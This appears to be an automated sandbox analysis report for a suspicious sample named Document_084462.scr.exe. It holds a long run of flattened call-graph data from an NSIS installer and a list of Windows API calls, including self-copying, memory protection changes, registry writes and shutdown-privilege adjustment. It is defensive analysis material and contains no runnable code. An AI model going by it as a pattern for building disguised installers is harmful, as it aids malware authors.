5123->5122 5124 700b152e GlobalFree 5123->5124 5124->5116 5128 4016cc 5129 402d3e 17 API calls 5128->5129 5130 4016d2 GetFullPathNameW 5129->5130 5131 40170e 5130->5131 5132 4016ec 5130->5132 5133 402bc2 5131->5133 5134 401723 GetShortPathNameW 5131->5134 5132->5131 5135 40674c 2 API calls 5132->5135 5134->5133 5136 4016fe 5135->5136 5136->5131 5138 4063ee lstrcpynW 5136->5138 5138->5131 5139 401e4e GetDC 5140 402d1c 17 API calls 5139->5140 5141 401e60 GetDeviceCaps MulDiv ReleaseDC 5140->5141 5142 402d1c 17 API calls 5141->5142 5143 401e91 5142->5143 5144 40642b 17 API calls 5143->5144 5145 401ece CreateFontIndirectW 5144->5145 5146 402630 5145->5146 5147 402acf 5148 402d1c 17 API calls 5147->5148 5149 402ad5 5148->5149 5150 402b12 5149->5150 5151 402ae7 5149->5151 5153 402925 5149->5153 5152 40642b 17 API calls 5150->5152 5150->5153 5151->5153 5155 406335 wsprintfW 5151->5155 5152->5153 5155->5153 4728 4020d0 4729 4020e2 4728->4729 4730 402194 4728->4730 4731 402d3e 17 API calls 4729->4731 4733 401423 24 API calls 4730->4733 4732 4020e9 4731->4732 4734 402d3e 17 API calls 4732->4734 4739 4022ee 4733->4739 4735 4020f2 4734->4735 4736 402108 LoadLibraryExW 4735->4736 4737 4020fa GetModuleHandleW 4735->4737 4736->4730 4738 402119 4736->4738 4737->4736 4737->4738 4751 406852 4738->4751 4742 402163 4744 405456 24 API calls 4742->4744 4743 40212a 4745 402132 4743->4745 4746 402149 4743->4746 4747 40213a 4744->4747 4748 401423 24 API calls 4745->4748 4756 700b1777 4746->4756 4747->4739 4749 402186 FreeLibrary 4747->4749 4748->4747 4749->4739 4798 406410 WideCharToMultiByte 4751->4798 4753 40686f 4754 406876 GetProcAddress 4753->4754 4755 402124 4753->4755 4754->4755 4755->4742 4755->4743 4757 700b17aa 4756->4757 4799 700b1b5f 4757->4799 4759 700b17b1 4760 700b18d6 4759->4760 4761 700b17c9 4759->4761 4762 700b17c2 4759->4762 4760->4747 4833 700b23e0 4761->4833 4849 700b239e 4762->4849 4767 700b180f 4862 700b25b5 4767->4862 4768 700b182d 4771 700b187e 4768->4771 4772 
700b1833 4768->4772 4769 700b17f8 4786 700b17ee 4769->4786 4859 700b2d83 4769->4859 4770 700b17df 4774 700b17e5 4770->4774 4780 700b17f0 4770->4780 4778 700b25b5 10 API calls 4771->4778 4881 700b15c6 4772->4881 4774->4786 4843 700b2af8 4774->4843 4787 700b186f 4778->4787 4779 700b1815 4873 700b15b4 4779->4873 4853 700b2770 4780->4853 4784 700b17f6 4784->4786 4785 700b25b5 10 API calls 4785->4787 4786->4767 4786->4768 4790 700b18c5 4787->4790 4887 700b2578 4787->4887 4790->4760 4792 700b18cf GlobalFree 4790->4792 4792->4760 4795 700b18b1 4795->4790 4891 700b153d wsprintfW 4795->4891 4796 700b18aa FreeLibrary 4796->4795 4798->4753 4894 700b121b GlobalAlloc 4799->4894 4801 700b1b86 4895 700b121b GlobalAlloc 4801->4895 4803 700b1dcb GlobalFree GlobalFree GlobalFree 4804 700b1de8 4803->4804 4815 700b1e32 4803->4815 4806 700b21de 4804->4806 4812 700b1dfd 4804->4812 4804->4815 4805 700b1c86 GlobalAlloc 4825 700b1b91 4805->4825 4807 700b2200 GetModuleHandleW 4806->4807 4806->4815 4808 700b2211 LoadLibraryW 4807->4808 4809 700b2226 4807->4809 4808->4809 4808->4815 4902 700b161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4809->4902 4810 700b1cd1 lstrcpyW 4814 700b1cdb lstrcpyW 4810->4814 4811 700b1cef GlobalFree 4811->4825 4812->4815 4898 700b122c 4812->4898 4814->4825 4815->4759 4816 700b2278 4816->4815 4820 700b2285 lstrlenW 4816->4820 4817 700b2086 4901 700b121b GlobalAlloc 4817->4901 4903 700b161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4820->4903 4821 700b1fc7 GlobalFree 4821->4825 4822 700b210e 4822->4815 4830 700b2176 lstrcpyW 4822->4830 4823 700b2238 4823->4816 4831 700b2262 GetProcAddress 4823->4831 4825->4803 4825->4805 4825->4810 4825->4811 4825->4814 4825->4815 4825->4817 4825->4821 4825->4822 4826 700b1d2d 4825->4826 4828 700b122c 2 API calls 4825->4828 4826->4825 4896 700b158f GlobalSize GlobalAlloc 4826->4896 4827 700b229f 4827->4815 4828->4825 4830->4815 4831->4816 4832 700b208f 
4832->4759 4834 700b23f8 4833->4834 4836 700b2521 GlobalFree 4834->4836 4838 700b24cb GlobalAlloc CLSIDFromString 4834->4838 4839 700b24a0 GlobalAlloc WideCharToMultiByte 4834->4839 4840 700b122c GlobalAlloc lstrcpynW 4834->4840 4841 700b24ea 4834->4841 4905 700b12ba 4834->4905 4836->4834 4837 700b17cf 4836->4837 4837->4769 4837->4770 4837->4786 4838->4836 4839->4836 4840->4834 4841->4836 4909 700b2704 4841->4909 4845 700b2b0a 4843->4845 4844 700b2baf ReadFile 4848 700b2bcd 4844->4848 4845->4844 4847 700b2c99 4847->4786 4912 700b2aa2 4848->4912 4850 700b23b3 4849->4850 4851 700b23be GlobalAlloc 4850->4851 4852 700b17c8 4850->4852 4851->4850 4852->4761 4857 700b27a0 4853->4857 4854 700b283b GlobalAlloc 4858 700b285e 4854->4858 4855 700b284e 4856 700b2854 GlobalSize 4855->4856 4855->4858 4856->4858 4857->4854 4857->4855 4858->4784 4861 700b2d8e 4859->4861 4860 700b2dce GlobalFree 4861->4860 4916 700b121b GlobalAlloc 4862->4916 4864 700b25bf 4865 700b266b lstrcpynW 4864->4865 4866 700b265a StringFromGUID2 4864->4866 4867 700b2638 MultiByteToWideChar 4864->4867 4868 700b267e wsprintfW 4864->4868 4869 700b26a2 GlobalFree 4864->4869 4870 700b26d7 GlobalFree 4864->4870 4871 700b1272 2 API calls 4864->4871 4917 700b12e1 4864->4917 4865->4864 4866->4864 4867->4864 4868->4864 4869->4864 4870->4779 4871->4864 4921 700b121b GlobalAlloc 4873->4921 4875 700b15b9 4876 700b15c6 2 API calls 4875->4876 4877 700b15c3 4876->4877 4878 700b1272 4877->4878 4879 700b127b GlobalAlloc lstrcpynW 4878->4879 4880 700b12b5 GlobalFree 4878->4880 4879->4880 4880->4787 4883 700b15d2 wsprintfW 4881->4883 4884 700b15ff lstrcpyW 4881->4884 4886 700b1618 4883->4886 4884->4886 4886->4785 4888 700b2586 4887->4888 4890 700b1891 4887->4890 4889 700b25a2 GlobalFree 4888->4889 4888->4890 4889->4888 4890->4795 4890->4796 4892 700b1272 2 API calls 4891->4892 4893 700b155e 4892->4893 4893->4790 4894->4801 4895->4825 4897 700b15ad 4896->4897 4897->4826 4904 700b121b GlobalAlloc 4898->4904 4900 700b123b 
lstrcpynW 4900->4815 4901->4832 4902->4823 4903->4827 4904->4900 4906 700b12c1 4905->4906 4907 700b122c 2 API calls 4906->4907 4908 700b12df 4907->4908 4908->4834 4910 700b2768 4909->4910 4911 700b2712 VirtualAlloc 4909->4911 4910->4841 4911->4910 4913 700b2aad 4912->4913 4914 700b2abd 4913->4914 4915 700b2ab2 GetLastError 4913->4915 4914->4847 4915->4914 4916->4864 4918 700b12ea 4917->4918 4919 700b130c 4917->4919 4918->4919 4920 700b12f0 lstrcpyW 4918->4920 4919->4864 4920->4919 4921->4875 5156 4028d5 5157 4028dd 5156->5157 5158 4028e1 FindNextFileW 5157->5158 5161 4028f3 5157->5161 5159 40293a 5158->5159 5158->5161 5162 4063ee lstrcpynW 5159->5162 5162->5161 5163 401956 5164 402d3e 17 API calls 5163->5164 5165 40195d lstrlenW 5164->5165 5166 402630 5165->5166 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 4988 40175c 4989 402d3e 17 API calls 4988->4989 4990 401763 4989->4990 4991 405f13 2 API calls 4990->4991 4992 40176a 4991->4992 4993 405f13 2 API calls 4992->4993 4993->4992 5167 401d5d 5168 402d1c 17 API calls 5167->5168 5169 401d6e SetWindowLongW 5168->5169 5170 402bc2 5169->5170 4994 401ede 4995 402d1c 17 API calls 4994->4995 4996 401ee4 4995->4996 4997 402d1c 17 API calls 4996->4997 4998 401ef0 4997->4998 4999 401f07 EnableWindow 4998->4999 5000 401efc ShowWindow 4998->5000 5001 402bc2 4999->5001 5000->5001 5171 401563 5172 402b08 5171->5172 5175 406335 wsprintfW 5172->5175 5174 402b0d 5175->5174 5176 4026e4 5177 402d1c 17 API calls 5176->5177 5178 4026f3 5177->5178 5179 40273d ReadFile 5178->5179 5180 405f67 ReadFile 5178->5180 5181 402832 5178->5181 5182 40277d MultiByteToWideChar 5178->5182 5185 4027a3 SetFilePointer MultiByteToWideChar 5178->5185 5186 402843 5178->5186 5188 402830 5178->5188 5189 405fc5 SetFilePointer 5178->5189 5179->5178 5179->5188 5180->5178 5198 406335 wsprintfW 5181->5198 5182->5178 5185->5178 5187 402864 SetFilePointer 5186->5187 
5186->5188 5187->5188 5190 405ff9 5189->5190 5191 405fe1 5189->5191 5190->5178 5192 405f67 ReadFile 5191->5192 5193 405fed 5192->5193 5193->5190 5194 406002 SetFilePointer 5193->5194 5195 40602a SetFilePointer 5193->5195 5194->5195 5196 40600d 5194->5196 5195->5190 5197 405f96 WriteFile 5196->5197 5197->5190 5198->5188 5199 700b2ca3 5200 700b2cbb 5199->5200 5201 700b158f 2 API calls 5200->5201 5202 700b2cd6 5201->5202 5203 401968 5204 402d1c 17 API calls 5203->5204 5205 40196f 5204->5205 5206 402d1c 17 API calls 5205->5206 5207 40197c 5206->5207 5208 402d3e 17 API calls 5207->5208 5209 401993 lstrlenW 5208->5209 5210 4019a4 5209->5210 5211 4019e5 5210->5211 5215 4063ee lstrcpynW 5210->5215 5213 4019d5 5213->5211 5214 4019da lstrlenW 5213->5214 5214->5211 5215->5213 5216 40166a 5217 402d3e 17 API calls 5216->5217 5218 401670 5217->5218 5219 40674c 2 API calls 5218->5219 5220 401676 5219->5220 4562 403e6b 4563 403e83 4562->4563 4564 403fbe 4562->4564 4563->4564 4565 403e8f 4563->4565 4566 403fcf GetDlgItem GetDlgItem 4564->4566 4571 40400f 4564->4571 4568 403e9a SetWindowPos 4565->4568 4569 403ead 4565->4569 4570 404344 18 API calls 4566->4570 4567 404069 4572 404390 SendMessageW 4567->4572 4583 403fb9 4567->4583 4568->4569 4573 403eb2 ShowWindow 4569->4573 4574 403eca 4569->4574 4575 403ff9 SetClassLongW 4570->4575 4571->4567 4576 401389 2 API calls 4571->4576 4601 40407b 4572->4601 4573->4574 4577 403ed2 DestroyWindow 4574->4577 4578 403eec 4574->4578 4579 40140b 2 API calls 4575->4579 4582 404041 4576->4582 4584 4042cd 4577->4584 4580 403ef1 SetWindowLongW 4578->4580 4581 403f02 4578->4581 4579->4571 4580->4583 4585 403fab 4581->4585 4586 403f0e GetDlgItem 4581->4586 4582->4567 4587 404045 SendMessageW 4582->4587 4584->4583 4593 4042fe ShowWindow 4584->4593 4642 4043ab 4585->4642 4590 403f21 SendMessageW IsWindowEnabled 4586->4590 4591 403f3e 4586->4591 4587->4583 4588 40140b 2 API calls 4588->4601 4589 4042cf DestroyWindow EndDialog 4589->4584 4590->4583 
4590->4591 4595 403f4b 4591->4595 4598 403f92 SendMessageW 4591->4598 4599 403f5e 4591->4599 4607 403f43 4591->4607 4593->4583 4594 40642b 17 API calls 4594->4601 4595->4598 4595->4607 4597 404344 18 API calls 4597->4601 4598->4585 4602 403f66 4599->4602 4603 403f7b 4599->4603 4600 403f79 4600->4585 4601->4583 4601->4588 4601->4589 4601->4594 4601->4597 4624 40420f DestroyWindow 4601->4624 4633 404344 4601->4633 4605 40140b 2 API calls 4602->4605 4604 40140b 2 API calls 4603->4604 4606 403f82 4604->4606 4605->4607 4606->4585 4606->4607 4639 40431d 4607->4639 4609 4040f6 GetDlgItem 4610 404113 ShowWindow KiUserCallbackDispatcher 4609->4610 4611 40410b 4609->4611 4636 404366 KiUserCallbackDispatcher 4610->4636 4611->4610 4613 40413d EnableWindow 4618 404151 4613->4618 4614 404156 GetSystemMenu EnableMenuItem SendMessageW 4615 404186 SendMessageW 4614->4615 4614->4618 4615->4618 4617 403e4c 18 API calls 4617->4618 4618->4614 4618->4617 4637 404379 SendMessageW 4618->4637 4638 4063ee lstrcpynW 4618->4638 4620 4041b5 lstrlenW 4621 40642b 17 API calls 4620->4621 4622 4041cb SetWindowTextW 4621->4622 4623 401389 2 API calls 4622->4623 4623->4601 4624->4584 4625 404229 CreateDialogParamW 4624->4625 4625->4584 4626 40425c 4625->4626 4627 404344 18 API calls 4626->4627 4628 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4627->4628 4629 401389 2 API calls 4628->4629 4630 4042ad 4629->4630 4630->4583 4631 4042b5 ShowWindow 4630->4631 4632 404390 SendMessageW 4631->4632 4632->4584 4634 40642b 17 API calls 4633->4634 4635 40434f SetDlgItemTextW 4634->4635 4635->4609 4636->4613 4637->4618 4638->4620 4640 404324 4639->4640 4641 40432a SendMessageW 4639->4641 4640->4641 4641->4600 4643 40446e 4642->4643 4644 4043c3 GetWindowLongW 4642->4644 4643->4583 4644->4643 4645 4043d8 4644->4645 4645->4643 4646 404405 GetSysColor 4645->4646 4647 404408 4645->4647 4646->4647 4648 404418 SetBkMode 4647->4648 4649 40440e SetTextColor 4647->4649 4650 404430 GetSysColor 4648->4650 
4651 404436 4648->4651 4649->4648 4650->4651 4652 404447 4651->4652 4653 40443d SetBkColor 4651->4653 4652->4643 4654 404461 CreateBrushIndirect 4652->4654 4655 40445a DeleteObject 4652->4655 4653->4652 4654->4643 4655->4654 5221 4023ec 5222 402d3e 17 API calls 5221->5222 5223 4023fb 5222->5223 5224 402d3e 17 API calls 5223->5224 5225 402404 5224->5225 5226 402d3e 17 API calls 5225->5226 5227 40240e GetPrivateProfileStringW 5226->5227 5228 4047ee 5229 404824 5228->5229 5230 4047fe 5228->5230 5231 4043ab 8 API calls 5229->5231 5232 404344 18 API calls 5230->5232 5234 404830 5231->5234 5233 40480b SetDlgItemTextW 5232->5233 5233->5229 4687 40176f 4688 402d3e 17 API calls 4687->4688 4689 401776 4688->4689 4690 401796 4689->4690 4691 40179e 4689->4691 4726 4063ee lstrcpynW 4690->4726 4727 4063ee lstrcpynW 4691->4727 4694 40179c 4698 40669d 5 API calls 4694->4698 4695 4017a9 4696 405cc3 3 API calls 4695->4696 4697 4017af lstrcatW 4696->4697 4697->4694 4708 4017bb 4698->4708 4699 40674c 2 API calls 4699->4708 4700 405ebf 2 API calls 4700->4708 4702 4017cd CompareFileTime 4702->4708 4703 40188d 4704 405456 24 API calls 4703->4704 4707 401897 4704->4707 4705 405456 24 API calls 4713 401879 4705->4713 4706 4063ee lstrcpynW 4706->4708 4709 40324c 31 API calls 4707->4709 4708->4699 4708->4700 4708->4702 4708->4703 4708->4706 4714 40642b 17 API calls 4708->4714 4722 405a54 MessageBoxIndirectW 4708->4722 4723 401864 4708->4723 4725 405ee4 GetFileAttributesW CreateFileW 4708->4725 4710 4018aa 4709->4710 4711 4018be SetFileTime 4710->4711 4712 4018d0 CloseHandle 4710->4712 4711->4712 4712->4713 4715 4018e1 4712->4715 4714->4708 4716 4018e6 4715->4716 4717 4018f9 4715->4717 4718 40642b 17 API calls 4716->4718 4719 40642b 17 API calls 4717->4719 4720 4018ee lstrcatW 4718->4720 4721 401901 4719->4721 4720->4721 4721->4713 4724 405a54 MessageBoxIndirectW 4721->4724 4722->4708 4723->4705 4723->4713 4724->4713 4725->4708 4726->4694 4727->4695 5235 401a72 5236 402d1c 17 API calls 
5235->5236 5237 401a7b 5236->5237 5238 402d1c 17 API calls 5237->5238 5239 401a20 5238->5239 4922 401573 4923 401583 ShowWindow 4922->4923 4924 40158c 4922->4924 4923->4924 4925 402bc2 4924->4925 4926 40159a ShowWindow 4924->4926 4926->4925 5240 4014f5 SetForegroundWindow 5241 402bc2 5240->5241 5242 700b103d 5243 700b101b 5 API calls 5242->5243 5244 700b1056 5243->5244 5245 401ff6 5246 402d3e 17 API calls 5245->5246 5247 401ffd 5246->5247 5248 40674c 2 API calls 5247->5248 5249 402003 5248->5249 5251 402014 5249->5251 5252 406335 wsprintfW 5249->5252 5252->5251 5253 4022f7 5254 402d3e 17 API calls 5253->5254 5255 4022fd 5254->5255 5256 402d3e 17 API calls 5255->5256 5257 402306 5256->5257 5258 402d3e 17 API calls 5257->5258 5259 40230f 5258->5259 5260 40674c 2 API calls 5259->5260 5261 402318 5260->5261 5262 402329 lstrlenW lstrlenW 5261->5262 5266 40231c 5261->5266 5264 405456 24 API calls 5262->5264 5263 405456 24 API calls 5267 402324 5263->5267 5265 402367 SHFileOperationW 5264->5265 5265->5266 5265->5267 5266->5263 5266->5267 5268 401b77 5269 402d3e 17 API calls 5268->5269 5270 401b7e 5269->5270 5271 402d1c 17 API calls 5270->5271 5272 401b87 wsprintfW 5271->5272 5273 402bc2 5272->5273 5274 40447a lstrcpynW lstrlenW 5275 40167b 5276 402d3e 17 API calls 5275->5276 5277 401682 5276->5277 5278 402d3e 17 API calls 5277->5278 5279 40168b 5278->5279 5280 402d3e 17 API calls 5279->5280 5281 401694 MoveFileW 5280->5281 5282 4016a7 5281->5282 5288 4016a0 5281->5288 5283 40674c 2 API calls 5282->5283 5286 4022ee 5282->5286 5285 4016b6 5283->5285 5284 401423 24 API calls 5284->5286 5285->5286 5287 4061b4 36 API calls 5285->5287 5287->5288 5288->5284 5289 403a7b 5290 403a86 5289->5290 5291 403a8d GlobalAlloc 5290->5291 5292 403a8a 5290->5292 5291->5292 5293 40237b 5294 402382 5293->5294 5297 402395 5293->5297 5295 40642b 17 API calls 5294->5295 5296 40238f 5295->5296 5296->5297 5298 405a54 MessageBoxIndirectW 5296->5298 5298->5297 5299 4019ff 5300 402d3e 17 API calls 
5299->5300 5301 401a06 5300->5301 5302 402d3e 17 API calls 5301->5302 5303 401a0f 5302->5303 5304 401a16 lstrcmpiW 5303->5304 5305 401a28 lstrcmpW 5303->5305 5306 401a1c 5304->5306 5305->5306 5307 401000 5308 401037 BeginPaint GetClientRect 5307->5308 5309 40100c DefWindowProcW 5307->5309 5311 4010f3 5308->5311 5312 401179 5309->5312 5313 401073 CreateBrushIndirect FillRect DeleteObject 5311->5313 5314 4010fc 5311->5314 5313->5311 5315 401102 CreateFontIndirectW 5314->5315 5316 401167 EndPaint 5314->5316 5315->5316 5317 401112 6 API calls 5315->5317 5316->5312 5317->5316 5318 401d81 5319 401d94 GetDlgItem 5318->5319 5320 401d87 5318->5320 5322 401d8e 5319->5322 5321 402d1c 17 API calls 5320->5321 5321->5322 5323 401dd5 GetClientRect LoadImageW SendMessageW 5322->5323 5325 402d3e 17 API calls 5322->5325 5326 401e33 5323->5326 5328 401e3f 5323->5328 5325->5323 5327 401e38 DeleteObject 5326->5327 5326->5328 5327->5328 5329 402482 5330 402d3e 17 API calls 5329->5330 5331 402494 5330->5331 5332 402d3e 17 API calls 5331->5332 5333 40249e 5332->5333 5346 402dce 5333->5346 5336 402bc2 5337 4024d6 5340 402d1c 17 API calls 5337->5340 5342 4024e2 5337->5342 5338 402d3e 17 API calls 5339 4024cc lstrlenW 5338->5339 5339->5337 5340->5342 5341 402501 RegSetValueExW 5344 402517 RegCloseKey 5341->5344 5342->5341 5343 40324c 31 API calls 5342->5343 5343->5341 5344->5336 5347 402de9 5346->5347 5350 406289 5347->5350 5351 406298 5350->5351 5352 4062a3 RegCreateKeyExW 5351->5352 5353 4024ae 5351->5353 5352->5353 5353->5336 5353->5337 5353->5338 5354 700b2349 5355 700b23b3 5354->5355 5356 700b23be GlobalAlloc 5355->5356 5357 700b23dd 5355->5357 5356->5355 5358 402902 5359 402d3e 17 API calls 5358->5359 5360 402909 FindFirstFileW 5359->5360 5361 402931 5360->5361 5364 40291c 5360->5364 5362 40293a 5361->5362 5366 406335 wsprintfW 5361->5366 5367 4063ee lstrcpynW 5362->5367 5366->5362 5367->5364 5368 401503 5369 40150b 5368->5369 5370 40151e 5368->5370 5371 402d1c 17 API calls 5369->5371 
5371->5370 5372 404503 5373 404635 5372->5373 5374 40451b 5372->5374 5375 40469f 5373->5375 5376 404769 5373->5376 5381 404670 GetDlgItem SendMessageW 5373->5381 5378 404344 18 API calls 5374->5378 5375->5376 5377 4046a9 GetDlgItem 5375->5377 5383 4043ab 8 API calls 5376->5383 5379 4046c3 5377->5379 5380 40472a 5377->5380 5382 404582 5378->5382 5379->5380 5388 4046e9 SendMessageW LoadCursorW SetCursor 5379->5388 5380->5376 5384 40473c 5380->5384 5405 404366 KiUserCallbackDispatcher 5381->5405 5386 404344 18 API calls 5382->5386 5387 404764 5383->5387 5389 404752 5384->5389 5390 404742 SendMessageW 5384->5390 5392 40458f CheckDlgButton 5386->5392 5409 4047b2 5388->5409 5389->5387 5394 404758 SendMessageW 5389->5394 5390->5389 5391 40469a 5406 40478e 5391->5406 5403 404366 KiUserCallbackDispatcher 5392->5403 5394->5387 5398 4045ad GetDlgItem 5404 404379 SendMessageW 5398->5404 5400 4045c3 SendMessageW 5401 4045e0 GetSysColor 5400->5401 5402 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5400->5402 5401->5402 5402->5387 5403->5398 5404->5400 5405->5391 5407 4047a1 SendMessageW 5406->5407 5408 40479c 5406->5408 5407->5375 5408->5407 5412 405a1a ShellExecuteExW 5409->5412 5411 404718 LoadCursorW SetCursor 5411->5380 5412->5411 5413 402889 5414 402890 5413->5414 5416 402b0d 5413->5416 5415 402d1c 17 API calls 5414->5415 5417 402897 5415->5417 5418 4028a6 SetFilePointer 5417->5418 5418->5416 5419 4028b6 5418->5419 5421 406335 wsprintfW 5419->5421 5421->5416 5422 404b8b 5423 404bb7 5422->5423 5424 404b9b 5422->5424 5426 404bea 5423->5426 5427 404bbd SHGetPathFromIDListW 5423->5427 5433 405a38 GetDlgItemTextW 5424->5433 5429 404bd4 SendMessageW 5427->5429 5430 404bcd 5427->5430 5428 404ba8 SendMessageW 5428->5423 5429->5426 5432 40140b 2 API calls 5430->5432 5432->5429 5433->5428 5434 40190c 5435 401943 5434->5435 5436 402d3e 17 API calls 5435->5436 5437 401948 5436->5437 5438 405b00 67 API calls 5437->5438 5439 401951 5438->5439 5440 40190f 5441 402d3e 
17 API calls 5440->5441 5442 401916 5441->5442 5443 405a54 MessageBoxIndirectW 5442->5443 5444 40191f 5443->5444 5445 401491 5446 405456 24 API calls 5445->5446 5447 401498 5446->5447 5448 700b18d9 5449 700b18fc 5448->5449 5450 700b1931 GlobalFree 5449->5450 5451 700b1943 5449->5451 5450->5451 5452 700b1272 2 API calls 5451->5452 5453 700b1ace GlobalFree GlobalFree 5452->5453 5454 401f12 5455 402d3e 17 API calls 5454->5455 5456 401f18 5455->5456 5457 402d3e 17 API calls 5456->5457 5458 401f21 5457->5458 5459 402d3e 17 API calls 5458->5459 5460 401f2a 5459->5460 5461 402d3e 17 API calls 5460->5461 5462 401f33 5461->5462 5463 401423 24 API calls 5462->5463 5464 401f3a 5463->5464 5471 405a1a ShellExecuteExW 5464->5471 5466 401f82 5469 402925 5466->5469 5472 40688e WaitForSingleObject 5466->5472 5468 401f9f CloseHandle 5468->5469 5471->5466 5473 4068a8 5472->5473 5474 4068ba GetExitCodeProcess 5473->5474 5475 40681f 2 API calls 5473->5475 5474->5468 5476 4068af WaitForSingleObject 5475->5476 5476->5473 5477 700b1058 5479 700b1074 5477->5479 5478 700b10dd 5479->5478 5480 700b1516 GlobalFree 5479->5480 5481 700b1092 5479->5481 5480->5481 5482 700b1516 GlobalFree 5481->5482 5483 700b10a2 5482->5483 5484 700b10a9 GlobalSize 5483->5484 5485 700b10b2 5483->5485 5484->5485 5486 700b10b6 GlobalAlloc 5485->5486 5488 700b10c7 5485->5488 5487 700b153d 3 API calls 5486->5487 5487->5488 5489 700b10d2 GlobalFree 5488->5489 5489->5478 4927 700b29df 4928 700b2a2f 4927->4928 4929 700b29ef VirtualProtect 4927->4929 4929->4928 5490 402614 5491 402d3e 17 API calls 5490->5491 5492 40261b 5491->5492 5495 405ee4 GetFileAttributesW CreateFileW 5492->5495 5494 402627 5495->5494 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4938 4057c0 4934->4938 4939 405787 ShowWindow ShowWindow 4934->4939 4935->4934 4979 

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 004034C5
                                                                              • GetVersion.KERNEL32 ref: 004034CB
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034FE
                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040353B
                                                                              • OleInitialize.OLE32(00000000), ref: 00403542
                                                                              • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 0040355E
                                                                              • GetCommandLineW.KERNEL32(007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 00403573
                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Document_084462.scr.exe",00000020,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,?,00000007,00000009,0000000B), ref: 004035AB
                                                                                • Part of subcall function 004067E3: GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                • Part of subcall function 004067E3: GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036E5
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403702
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403716
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371E
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040372F
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403737
                                                                              • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040374B
                                                                                • Part of subcall function 004063EE: lstrcpynW.KERNEL32(?,?,00000400,00403573,007A7A60,NSIS Error,?,00000007,00000009,0000000B), ref: 004063FB
                                                                              • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403816
                                                                              • ExitProcess.KERNEL32 ref: 00403837
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040384A
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403859
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403864
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Document_084462.scr.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 00403870
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040388C
                                                                              • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,00000009,?,00000007,00000009,0000000B), ref: 004038E6
                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Document_084462.scr.exe,0079F708,?,?,00000007,00000009,0000000B), ref: 004038FA
                                                                              • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000,?,00000007,00000009,0000000B), ref: 00403927
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403956
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040395D
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403972
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403995
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BA
                                                                              • ExitProcess.KERNEL32 ref: 004039DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
